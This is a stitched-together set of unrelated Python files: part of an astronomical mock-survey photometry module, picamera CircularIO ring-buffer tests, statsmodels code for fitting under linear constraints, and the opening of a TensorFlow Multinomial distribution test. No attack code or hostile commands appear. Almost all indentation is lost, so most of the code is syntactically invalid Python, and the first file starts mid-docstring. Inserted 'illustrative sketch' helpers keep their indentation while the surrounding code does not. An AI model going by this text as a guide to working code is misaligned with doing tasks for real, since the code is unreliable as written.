stored internally under `data`.
Parameters
----------
Nobj : int
The number of objects to be simulated.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude allowed. Default is `(10,
maglim + 2.5 * np.log10(5))` where `maglim` is the 5-sigma limiting
magnitude in the reference filter.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
random state used to initialize the `MockSurvey` object will be
used.
zbounds : tuple of length 2, optional
            The minimum/maximum redshift allowed. Default is `(0, 15)`.
Nm : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample magnitudes.
Default is `1000`.
Nz : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample redshifts.
Default is `1000`.
pm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_tm`.
pztm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_ztm`.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
if pm_kwargs is None:
pm_kwargs = dict()
if ptm_kwargs is None:
ptm_kwargs = dict()
if pztm_kwargs is None:
pztm_kwargs = dict()
if rstate is None:
rstate = self.rstate
maglim = pm_kwargs.get('maglim',
self.filters[self.ref_filter]['depth_mag5sig'])
pm_kwargs['maglim'] = maglim # get 5-sigma limiting reference mag
if mbounds is None:
mbounds = (10, pm_kwargs['maglim'] + 2.5 * np.log10(5))
# Sample magnitudes.
if verbose:
sys.stderr.write('Sampling mags: ')
sys.stderr.flush()
mags = np.zeros(Nobj, dtype='float')
mags = draw_mag(Nobj, self.pm, pmag_kwargs=pm_kwargs, rstate=rstate,
mbounds=mbounds, Npoints=Nm) # sample magnitudes
if verbose:
sys.stderr.write('{0}/{1}'.format(Nobj, Nobj))
sys.stderr.flush()
# Sample types.
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
types = np.zeros(Nobj, dtype='int')
generator = draw_type_given_mag # alias for generator
for i, t in enumerate(generator(self.ptm, mags, self.NTYPE,
ptm_kwargs=ptm_kwargs,
rstate=rstate)):
types[i] = t # assign type draw
if verbose:
sys.stderr.write('\rSampling types: {0}/{1}'
.format(i+1, Nobj))
sys.stderr.flush()
# Re-label templates by type and construct probability vectors.
tmp_types = np.array([tmp['type'] for tmp in self.templates])
tmp_p = [np.array(t == tmp_types, dtype='float') / sum(t == tmp_types)
for t in self.TYPES]
# Sample templates from types.
templates = np.empty(Nobj, dtype='int')
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
for i in range(self.NTYPE):
n = int(sum(types == i)) # number of objects of a given type
templates[types == i] = rstate.choice(self.NTEMPLATE, size=n,
p=tmp_p[i])
if verbose:
sys.stderr.write('\rSampling templates within each type: '
'{0}/{1}'.format(i+1, self.NTYPE))
sys.stderr.flush()
# Sample redshifts.
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
redshifts = np.zeros(Nobj, dtype='float')
generator = draw_redshift_given_type_mag
for i, z in enumerate(generator(self.pztm, types, mags,
pztm_kwargs=pztm_kwargs,
zbounds=zbounds, Npoints=Nz,
rstate=rstate)):
redshifts[i] = z # assign redshift draw
if verbose:
sys.stderr.write('\rSampling redshifts: {0}/{1}'
.format(i+1, Nobj))
sys.stderr.flush()
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
# Save data.
self.data = {'refmags': mags, 'types': types,
'templates': templates, 'redshifts': redshifts}
self.NOBJ = Nobj
def sample_phot(self, red_fn='madau+99', rnoise_fn=None, rstate=None,
verbose=True):
"""
Generate noisy photometry from `(t, z, m)` samples. **Note that this
ignores Poisson noise**. Results are added internally to `data`.
Parameters
----------
red_fn : function, optional
A function that adds in reddening from the intergalactic medium
(IGM). Default is `'madau+99'`, which uses the parametric form
from Madau et al. (1999). If `None` is passed, no reddening will
be applied.
rnoise_fn : function, optional
A function that takes the average noise (computed from the
provided survey depths) and jitters them to mimic spatial
background variation.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
random state used to initialize the `MockSurvey` object will be
used.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
if rstate is None:
rstate = self.rstate
# Grab data.
try:
mags = self.data['refmags']
types = self.data['types']
templates = self.data['templates']
redshifts = self.data['redshifts']
except:
raise ValueError("No mock data has been generated.")
# Extract reddening function.
try:
red_fn = _IGM[red_fn]
except:
pass
# Initialize useful quantities.
tlw = [np.log(t['wavelength']) for t in self.templates] # ln(tmp wave)
flw = [np.log(f['wavelength']) for f in self.filters] # ln(flt wave)
filt_nu = [f['frequency'] for f in self.filters] # filt nu
        filt_t = [f['transmission'] for f in self.filters]  # filt transmission
norm = [np.trapz(ft / fn, fn)
for ft, fn in zip(filt_t, filt_nu)] # filter normalization
tfnu = [t['fnu'] for t in self.templates]
# Compute unnormalized photometry.
phot = np.zeros((self.NOBJ, self.NFILTER)) # photometry array
for i, (t, z) in enumerate(zip(templates, redshifts)):
# Compute reddening.
if red_fn is not None:
igm_teff = [red_fn(np.exp(f_lw), z) for f_lw in flw]
else:
igm_teff = [np.ones_like(f_lw) for f_lw in flw]
# Integrate the flux over the filter. Interpolation is performed
# using the arcsinh transform for improved numerical stability.
phot[i] = [np.trapz(np.sinh(np.interp(f_lw, tlw[t] + np.log(1 + z),
np.arcsinh(tfnu[t]))) *
f_t / f_nu * te, f_nu) / f_n
for f_t, f_nu, f_lw, f_n, te in zip(filt_t, filt_nu,
flw, norm,
igm_teff)]
if verbose:
sys.stderr.write('\rGenerating photometry: {0}/{1}'
.format(i+1, self.NOBJ))
sys.stderr.flush()
# Normalize photometry to reference magnitude.
with warnings.catch_warnings():
warnings.simplefilter('ignore')
fluxes = 10**((mags - 23.9) / -2.5) # convert to flux
phot /= phot[:, self.ref_filter][:, None] # norm to ref_flux=1.
phot *= fluxes[:, None] # multiply by actual ref_flux value
# Deal with "bad" (nonsensical) photometry.
sel_badphot = np.unique(np.nonzero(~np.isfinite(phot))[0])
self.data['refmags'][sel_badphot] = np.inf # fix magnitudes
phot[sel_badphot] = -np.inf # fix fluxes
# Compute errors.
if verbose:
sys.stderr.write('\nSampling errors: ')
sys.stderr.flush()
fnoise = np.array([np.ones(self.NOBJ) * f['depth_flux1sig']
for f in self.filters]).T
if rnoise_fn is not None:
fnoise = rnoise_fn(fnoise, rstate=rstate) # add noise variability
if verbose:
sys.stderr.write('{0}/{1}'.format(self.NOBJ, self.NOBJ))
sys.stderr.flush()
# Jittering fluxes.
if verbose:
sys.stderr.write('\nSampling photometry: ')
sys.stderr.flush()
phot_obs = rstate.normal(phot, fnoise)
if verbose:
sys.stderr.write('{0}/{1}\n'.format(self.NOBJ, self.NOBJ))
sys.stderr.flush()
# Save results.
self.data['phot_true'] = phot
self.data['phot_obs'] = phot_obs
self.data['phot_err'] = fnoise
def make_mock(self, Nobj, mbounds=None, zbounds=(0, 15),
Nm=1000, Nz=1000, pm_kwargs=None, ptm_kwargs=None,
pztm_kwargs=None, red_fn='madau+99', rnoise_fn=None,
rstate=None, verbose=True):
"""
Generate (noisy) photometry for `Nobj` objects sampled from the
prior. Wraps :meth:`sample_params` and :meth:`sample_phot`. Results are
stored internally under `data`.
Parameters
----------
Nobj : int
The number of objects to be simulated.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude allowed. Default is `(10,
maglim + 2.5 * np.log10(5))` where `maglim` is the 5-sigma limiting
magnitude in the reference filter.
zbounds : tuple of length 2, optional
            The minimum/maximum redshift allowed. Default is `(0, 15)`.
Nm : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample magnitudes.
Default is `1000`.
Nz : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample redshifts.
Default is `1000`.
pm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_tm`.
pztm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_ztm`.
red_fn : function, optional
A function that adds in reddening from the intergalactic medium
(IGM). Default is `'madau+99'`, which uses the parametric form
from Madau et al. (1999). If `None` is passed, no reddening will
be applied.
rnoise_fn : function, optional
A function that takes the average noise (computed from the
provided survey depths) and jitters them to mimic spatial
background variation.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
random state used to initialize the `MockSurvey` object will be
used.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
# Sample parameters.
self.sample_params(Nobj, mbounds=mbounds, zbounds=zbounds,
Nm=Nm, Nz=Nz, pm_kwargs=pm_kwargs, rstate=rstate,
ptm_kwargs=ptm_kwargs, pztm_kwargs=pztm_kwargs,
verbose=verbose)
# Sample photometry.
self.sample_phot(red_fn=red_fn, rnoise_fn=rnoise_fn,
rstate=rstate, verbose=verbose)
def make_model_grid(self, redshifts, red_fn='madau+99', verbose=True):
"""
Generate photometry for input set of templates over the input
`redshifts` grid. Results are stored internally under `models` as an
`(Nz, Nt, Nf)` `~numpy.ndarray` with `Nz` redshifts, `Nt` templates,
and `Nf` filters.
Parameters
----------
redshifts : iterable of shape (N,)
Input redshift grid.
red_fn : function, optional
A function that adds in reddening from the intergalactic medium
(IGM). Default is `'madau+99'`, which uses the parametric form
from Madau et al. (1999). If `None` is passed, no reddening will
be applied.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
Nz = len(redshifts)
# Extract reddening function.
try:
red_fn = _IGM[red_fn]
except:
pass
# Initialize useful quantities.
tlw = [np.log(t['wavelength']) for t in self.templates] # ln(tmp wave)
flw = [np.log(f['wavelength']) for f in self.filters] # ln(flt wave)
filt_nu = [f['frequency'] for f in self.filters] # filt nu
        filt_t = [f['transmission'] for f in self.filters]  # filt transmission
norm = [np.trapz(ft / fn, fn)
for ft, fn in zip(filt_t, filt_nu)] # filter normalization
tfnu = [t['fnu'] for t in self.templates]
# Compute unnormalized photometry.
phot = np.zeros((Nz, self.NTEMPLATE, self.NFILTER))
for i, z in enumerate(redshifts):
for j in range(self.NTEMPLATE):
# Compute reddening.
if red_fn is not None:
igm_teff = [red_fn(np.exp(f_lw), z) for f_lw in flw]
else:
igm_teff = [np.ones_like(f_lw) for f_lw in flw]
# Integrate the flux over the filter. Interpolation is done
# using the arcsinh transform for improved numerical stability.
phot[i, j] = [np.trapz(f_t / f_nu * te *
np.sinh(np.interp(f_lw, tlw[j] +
np.log(1 + z),
np.arcsinh(tfnu[j]))),
f_nu) / f_n
for f_t, f_nu, f_lw, f_n, te in zip(filt_t,
filt_nu,
flw, norm,
igm_teff)]
if verbose:
sys.stderr.write('\rGenerating model photometry grid: {0}/{1}'
.format(i+1, len(redshifts)))
sys.stderr.flush()
# Save results.
self.models = {'data': phot, 'zgrid': redshifts}
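# Illustrative sketch (not part of the original module): end-to-end use of
# `MockSurvey` with the built-in presets. This assumes the packaged filter/SED
# lists are installed and that the 'lsst' preset contains the 'r' reference
# filter.
def _example_mock_survey(Nobj=500):
    survey = MockSurvey(survey='lsst', templates='cww+', prior='bpz')
    survey.make_mock(Nobj, verbose=False)  # draw (z, t, m) and photometry
    return survey.data['redshifts'], survey.data['phot_obs']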
|
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python camera library for the Raspberry Pi camera module
# Copyright (c) 2013-2017 Dave Jones <[email protected]>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import mock
try:
from itertools import accumulate
except ImportError:
def accumulate(iterable):
it = iter(iterable)
total = next(it)
yield total
for element in it:
total += element
yield total
import pytest
from picamera.encoders import PiVideoFrame, PiVideoFrameType
from picamera.streams import CircularIO, PiCameraCircularIO
def test_init():
stream = CircularIO(10)
assert stream.readable()
assert stream.writable()
assert stream.seekable()
assert stream.size == 10
assert stream.tell() == 0
with pytest.raises(ValueError):
CircularIO(-1)
def test_seek_tell():
stream = CircularIO(10)
assert stream.tell() == 0
stream.write(b'defghijklm')
assert stream.tell() == 10
stream.seek(0)
assert stream.tell() == 0
stream.seek(4, io.SEEK_CUR)
assert stream.tell() == 4
stream.seek(0, io.SEEK_END)
assert stream.tell() == 10
with pytest.raises(ValueError):
stream.seek(-20, io.SEEK_END)
def test_read():
stream = CircularIO(10)
stream.write(b'abcdef')
stream.write(b'ghijklm')
stream.seek(0)
assert stream.read(1) == b'd'
assert stream.read(4) == b'efgh'
assert stream.read() == b'ijklm'
assert stream.tell() == 10
assert stream.read() == b''
stream.seek(0)
assert stream.read() == b'defghijklm'
def test_read1():
stream = CircularIO(10)
stream.write(b'abcdef')
stream.write(b'ghijklm')
stream.seek(0)
assert stream.read1() == b'def'
stream.seek(0)
assert stream.read1(5) == b'def'
assert stream.read1(3) == b'ghi'
assert stream.read1() == b'jklm'
assert stream.read1() == b''
def test_write():
stream = CircularIO(10)
stream.write(b'')
assert stream.tell() == 0
assert stream.getvalue() == b''
stream.seek(2)
stream.write(b'abc')
assert stream.getvalue() == b'\x00\x00abc'
assert stream.tell() == 5
stream.write(b'def')
assert stream.getvalue() == b'\x00\x00abcdef'
assert stream.tell() == 8
stream.write(b'ghijklm')
assert stream.getvalue() == b'defghijklm'
assert stream.tell() == 10
stream.seek(1)
stream.write(b'aaa')
assert stream.getvalue() == b'daaahijklm'
assert stream.tell() == 4
stream.seek(-2, io.SEEK_END)
stream.write(b'bbb')
assert stream.tell() == 10
assert stream.getvalue() == b'aaahijkbbb'
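# Illustrative sketch (not part of the original test suite): CircularIO acts
# as a ring buffer that silently discards the oldest bytes once more than
# `size` bytes have been written, which is what the assertions above exercise.
def _example_ring_buffer():
    stream = CircularIO(5)
    stream.write(b'abcdefgh')             # 8 bytes into a 5-byte ring
    assert stream.getvalue() == b'defgh'  # only the newest 5 bytes survive
    return stream.getvalue()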
def test_truncate():
stream = CircularIO(10)
stream.write(b'abcdef')
stream.write(b'ghijklm')
stream.seek(8)
stream.truncate()
stream.seek(0, io.SEEK_END)
assert stream.tell() == 8
stream.seek(10)
stream.truncate()
stream.seek(8)
assert stream.read() == b'\x00\x00'
stream.truncate(4)
stream.seek(0)
assert stream.read() == b'defg'
with pytest.raises(ValueError):
stream.truncate(-1)
def generate_frames(s, index=0):
# Generates a sequence of mock frame data and their corresponding
# PiVideoFrame meta-data objects.
pos = 0
timestamp = 0
for data in s:
if data == 'k':
pos += 1
yield data.encode('ascii'), PiVideoFrame(
index=index,
frame_type=PiVideoFrameType.key_frame,
frame_size=1,
video_size=pos,
split_size=pos,
timestamp=timestamp,
complete=False)
pos += 1
yield data.encode('ascii'), PiVideoFrame(
index=index,
frame_type={
'f': PiVideoFrameType.frame,
'k': PiVideoFrameType.key_frame,
'h': PiVideoFrameType.sps_header,
'm': PiVideoFrameType.motion_data,
}[data],
frame_size={
'f': 1,
'k': 2,
'h': 1,
'm': 1,
}[data],
video_size=pos,
split_size=pos,
timestamp=timestamp,
complete=True)
index += 1
timestamp += 1000000
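# Illustrative sketch (not part of the original test suite): generate_frames
# yields one (byte, PiVideoFrame) pair per character, with key frames ('k')
# contributing an extra incomplete chunk before the complete one.
def _example_generate_frames():
    data = [d for d, f in generate_frames('hkf')]
    frames = [f for d, f in generate_frames('hkf')]
    assert b''.join(data) == b'hkkf'  # 'k' contributes two bytes
    assert [f.complete for f in frames] == [True, False, True, True]
    return frames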
def test_camera_stream_init():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
with pytest.raises(ValueError):
PiCameraCircularIO(None, size=1)
with pytest.raises(ValueError):
PiCameraCircularIO(camera)
with pytest.raises(ValueError):
PiCameraCircularIO(camera, size=1, seconds=1)
assert PiCameraCircularIO(camera, seconds=1, bitrate=1024).size == 1024 // 8
def test_camera_stream_frames():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
frames = []
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
if frame.complete:
frames.append(frame)
stream.write(data)
assert stream.getvalue() == b'hkkffkkff'
assert list(stream.frames) == frames
assert list(reversed(stream.frames)) == frames[::-1]
def test_camera_stream_frames_trunc_right():
# We don't officially support this but the code should work if entire
# frames are truncated (without leaving partial frame data) which is what
# we're testing for here (of course, the resulting H.264 stream won't be
# valid, but we're not testing that...)
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
frames = []
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
if frame.complete:
frames.append(frame)
stream.write(data)
stream.seek(7)
stream.truncate()
del frames[-2:]
assert stream.getvalue() == b'hkkffkk'
assert list(stream.frames) == frames
assert list(reversed(stream.frames)) == frames[::-1]
def test_camera_stream_frames_trunc_left():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
frames = []
for data, frame in generate_frames('hkffkffhkff'):
encoder.frame = frame
if frame.complete:
frames.append(frame)
stream.write(data)
del frames[:3]
# As we've gotten rid of the start of the stream we need to re-calc the
# video and split sizes in the comparison meta-data
sizes = accumulate(f.frame_size for f in frames)
frames = [
PiVideoFrame(
f.index,
f.frame_type,
f.frame_size,
size,
size,
f.timestamp,
f.complete
)
for f, size in zip(frames, sizes)
]
assert stream.getvalue() == b'fkkffhkkff'
assert list(stream.frames) == frames
assert list(reversed(stream.frames)) == frames[::-1]
def test_camera_stream_clear():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
stream.clear()
assert stream.getvalue() == b''
assert list(stream.frames) == []
assert list(reversed(stream.frames)) == []
def test_camera_stream_copy_bad():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
with pytest.raises(ValueError):
PiCameraCircularIO(camera, size=10).copy_to('foo', size=1000, seconds=10)
def test_camera_stream_copy_all():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
output = io.BytesIO()
stream.copy_to(output)
assert output.getvalue() == b'hkkffkkff'
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
assert stream.getvalue() == b'fhkkffkkff'
output = io.BytesIO()
stream.copy_to(output)
assert output.getvalue() == b'hkkffkkff'
def test_camera_stream_copy_size():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
output = io.BytesIO()
stream.copy_to(output, size=5)
assert output.getvalue() == b''
stream.copy_to(output, size=10)
assert output.getvalue() == b'hkkffkkff'
def test_camera_stream_copy_seconds():
camera = mock.Mock()
encoder = mock.Mock()
camera._encoders = {1: encoder}
stream = PiCameraCircularIO(camera, size=10)
for data, frame in generate_frames('hkffkff'):
encoder.frame = frame
stream.write(data)
output = io.BytesIO()
stream.copy_to(output, seconds=1)
assert output.getvalue() == b''
stream.copy_to(output, seconds=10)
assert output.getvalue() == b'hkkffkkff'
|
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 15 16:36:05 2014
Author: Josef Perktold
License: BSD-3
"""
import numpy as np
class TransformRestriction(object):
"""Transformation for linear constraints `R params = q`
Note, the transformation from the reduced to the full parameters is an
affine and not a linear transformation if q is not zero.
Parameters
----------
R : array_like
Linear restriction matrix
q : arraylike or None
values of the linear restrictions
Notes
-----
The reduced parameters are not sorted with respect to constraints.
TODO: error checking, eg. inconsistent constraints, how?
    Inconsistent constraints will raise an exception during the calculation of
    the constant or offset. However, homogeneous constraints, where q=0, can
    have a solution in which the relevant parameters are constrained to be
    zero, as in the following example::
        b1 + b2 = 0 and b1 + 2*b2 = 0, implies that b2 = 0.
    The transformation applied from the full to the reduced parameter space
    does not raise an exception if the constraint does not hold.
TODO: maybe change this, what's the behavior in this case?
The `reduce` transform is applied to the array of explanatory variables,
`exog`, when transforming a linear model to impose the constraints.
"""
def __init__(self, R, q=None):
# The calculations are based on Stata manual for makecns
R = self.R = np.atleast_2d(R)
if q is not None:
q = self.q = np.asarray(q)
k_constr, k_vars = R.shape
self.k_constr, self.k_vars = k_constr, k_vars
self.k_unconstr = k_vars - k_constr
m = np.eye(k_vars) - R.T.dot(np.linalg.pinv(R).T)
evals, evecs = np.linalg.eigh(m)
        # This normalizes the transformation so the largest element is 1.
# It makes it easier to interpret simple restrictions, e.g. b1 + b2 = 0
# TODO: make this work, there is something wrong, does not round-trip
# need to adjust constant
#evecs_maxabs = np.max(np.abs(evecs), 0)
#evecs = evecs / evecs_maxabs
self.evals = evals
self.evecs = evecs # temporarily attach as attribute
L = self.L = evecs[:, :k_constr]
self.transf_mat = evecs[:, k_constr:]
if q is not None:
# use solve instead of inv
#self.constant = q.T.dot(np.linalg.inv(L.T.dot(R.T)).dot(L.T))
try:
self.constant = q.T.dot(np.linalg.solve(L.T.dot(R.T), L.T))
except np.linalg.linalg.LinAlgError as e:
raise ValueError('possibly inconsistent constraints. error '
'generated by\n%r' % (e, ))
else:
self.constant = 0
def expand(self, params_reduced):
"""transform from the reduced to the full parameter space
Parameters
----------
params_reduced : array_like
parameters in the transformed space
Returns
-------
params : array_like
parameters in the original space
Notes
-----
If the restriction is not homogeneous, i.e. q is not equal to zero,
then this is an affine transform.
"""
params_reduced = np.asarray(params_reduced)
return self.transf_mat.dot(params_reduced.T).T + self.constant
def reduce(self, params):
"""transform from the full to the reduced parameter space
Parameters
----------
params : array_like
parameters or data in the original space
Returns
-------
params_reduced : array_like
parameters in the transformed space
This transform can be applied to the original parameters as well
as to the data. If params is 2-d, then each row is transformed.
"""
params = np.asarray(params)
return params.dot(self.transf_mat)
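# Illustrative sketch (not part of the original module): imposing the single
# homogeneous constraint b1 - b2 = 0 on a 3-parameter vector and checking that
# expand(reduce(params)) round-trips when the constraint already holds.
def _example_transform_restriction():
    tr = TransformRestriction([[0, 1, -1]], [0])  # b1 = b2
    params = np.array([1.0, 2.5, 2.5])            # already satisfies R p = q
    reduced = tr.reduce(params)                   # 2 free parameters
    expanded = tr.expand(reduced)                 # back to 3 parameters
    return np.allclose(expanded, params)          # True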
def transform_params_constraint(params, Sinv, R, q):
"""find the parameters that statisfy linear constraint from unconstraint
The linear constraint R params = q is imposed.
Parameters
----------
params : array_like
        unconstrained parameters
Sinv : ndarray, 2d, symmetric
covariance matrix of the parameter estimate
R : ndarray, 2d
constraint matrix
q : ndarray, 1d
values of the constraint
Returns
-------
params_constraint : ndarray
parameters of the same length as params satisfying the constraint
Notes
-----
This is the exact formula for OLS and other linear models. It will be
a local approximation for nonlinear models.
TODO: Is Sinv always the covariance matrix?
In the linear case it can be (X'X)^{-1} or sigmahat^2 (X'X)^{-1}.
My guess is that this is the point in the subspace that satisfies
the constraint that has minimum Mahalanobis distance. Proof ?
"""
rsr = R.dot(Sinv).dot(R.T)
reduction = Sinv.dot(R.T).dot(np.linalg.solve(rsr, R.dot(params) - q))
return params - reduction
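# Illustrative sketch (not part of the original module): projecting an
# unconstrained estimate onto the constraint b0 + b1 = 1 with an identity
# "covariance", i.e. a plain least-distance projection.
def _example_transform_params_constraint():
    params = np.array([0.3, 0.9])
    R = np.array([[1.0, 1.0]])
    q = np.array([1.0])
    constrained = transform_params_constraint(params, np.eye(2), R, q)
    return constrained  # array([0.2, 0.8]), which sums to 1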
def fit_constrained(model, constraint_matrix, constraint_values,
start_params=None, fit_kwds=None):
# note: self is model instance
"""fit model subject to linear equality constraints
The constraints are of the form `R params = q`
where R is the constraint_matrix and q is the vector of constraint_values.
The estimation creates a new model with transformed design matrix,
exog, and converts the results back to the original parameterization.
Parameters
----------
model: model instance
An instance of a model, see limitations in Notes section
constraint_matrix : array_like, 2D
This is R in the linear equality constraint `R params = q`.
The number of columns needs to be the same as the number of columns
in exog.
constraint_values :
This is `q` in the linear equality constraint `R params = q`
If it is a tuple, then the constraint needs to be given by two
arrays (constraint_matrix, constraint_value), i.e. (R, q).
Otherwise, the constraints can be given as strings or list of
strings.
see t_test for details
start_params : None or array_like
starting values for the optimization. `start_params` needs to be
        given in the original parameter space and is internally
transformed.
    fit_kwds : dict, optional
        keyword arguments used in the optimization of the transformed model.
Returns
-------
    params : ndarray
        estimated parameters (in the original parameterization)
cov_params : ndarray
covariance matrix of the parameter estimates. This is a reverse
transformation of the covariance matrix of the transformed model given
by `cov_params()`
Note: `fit_kwds` can affect the choice of covariance, e.g. by
specifying `cov_type`, which will be reflected in the returned
covariance.
res_constr : results instance
This is the results instance for the created transformed model.
Notes
-----
Limitations:
Models where the number of parameters is different from the number of
columns of exog are not yet supported.
    Requires a model that implements an offset option.
"""
self = model # internal alias, used for methods
if fit_kwds is None:
fit_kwds = {}
R, q = constraint_matrix, constraint_values
endog, exog = self.endog, self.exog
transf = TransformRestriction(R, q)
exogp_st = transf.reduce(exog)
offset = exog.dot(transf.constant.squeeze())
if hasattr(self, 'offset'):
offset += self.offset
if start_params is not None:
start_params = transf.reduce(start_params)
#need copy, because we don't want to change it, we don't need deepcopy
import copy
init_kwds = copy.copy(self._get_init_kwds())
del init_kwds['offset'] # TODO: refactor to combine with above or offset_all
# using offset as keywords is not supported in all modules
mod_constr = self.__class__(endog, exogp_st, offset=offset, **init_kwds)
res_constr = mod_constr.fit(start_params=start_params, **fit_kwds)
params_orig = transf.expand(res_constr.params).squeeze()
cov_params = transf.transf_mat.dot(res_constr.cov_params()).dot(transf.transf_mat.T)
return params_orig, cov_params, res_constr
def fit_constrained_wrap(model, constraints, start_params=None, **fit_kwds):
"""fit_constraint that returns a results instance
This is a development version for fit_constrained methods or
fit_constrained as standalone function.
It will not work correctly for all models because creating a new
results instance is not standardized for use outside the `fit` methods,
    and might need adjustments for this.
This is the prototype for the fit_constrained method that has been added
to Poisson and GLM.
"""
self = model # alias for use as method
#constraints = (R, q)
# TODO: temporary trailing underscore to not overwrite the monkey
# patched version
# TODO: decide whether to move the imports
from patsy import DesignInfo
# we need this import if we copy it to a different module
#from statsmodels.base._constraints import fit_constrained
# same pattern as in base.LikelihoodModel.t_test
lc = DesignInfo(self.exog_names).linear_constraint(constraints)
R, q = lc.coefs, lc.constants
    # TODO: add start_params option, need access to transformation
# fit_constrained needs to do the transformation
params, cov, res_constr = fit_constrained(self, R, q,
start_params=start_params,
fit_kwds=fit_kwds)
#create dummy results Instance, TODO: wire up properly
res = self.fit(start_params=params, maxiter=0) # we get a wrapper back
res._results.params = params
res._results.normalized_cov_params = cov
k_constr = len(q)
res._results.df_resid += k_constr
res._results.df_model -= k_constr
res._results.constraints = lc
res._results.k_constr = k_constr
res._results.results_constrained = res_constr
return res
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib import distributions
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
ds = distributions
class MultinomialTest(test.TestCase):
def setUp(self):
self._rng = np.random.RandomState(42)
def testSimpleShapes(self):
with self.test_session():
p = [.1, .3, .6]
dist = ds.Multinomial(n=1., p=p)
self.assertEqual(3, dist.event_shape().eval())
self.assertAllEqual([], dist.batch_shape().eval())
self.assertEqual(tensor_shape.TensorShape([3]), dist.get_event_shape())
self.assertEqual(tensor_shape.TensorShape([]), dist.get_batch_shape())
def testComplexShapes(self):
with self.test_session():
p = 0.5 * np.ones([3, 2, 2], dtype=np.float32)
n = [[3., 2], [4, 5], [6, 7]]
dist = ds.Multinomial(n=n, p=p)
self.assertEqual(2, dist.event_shape().eval())
self.assertAllEqual([3, 2], dist.batch_shape().eval())
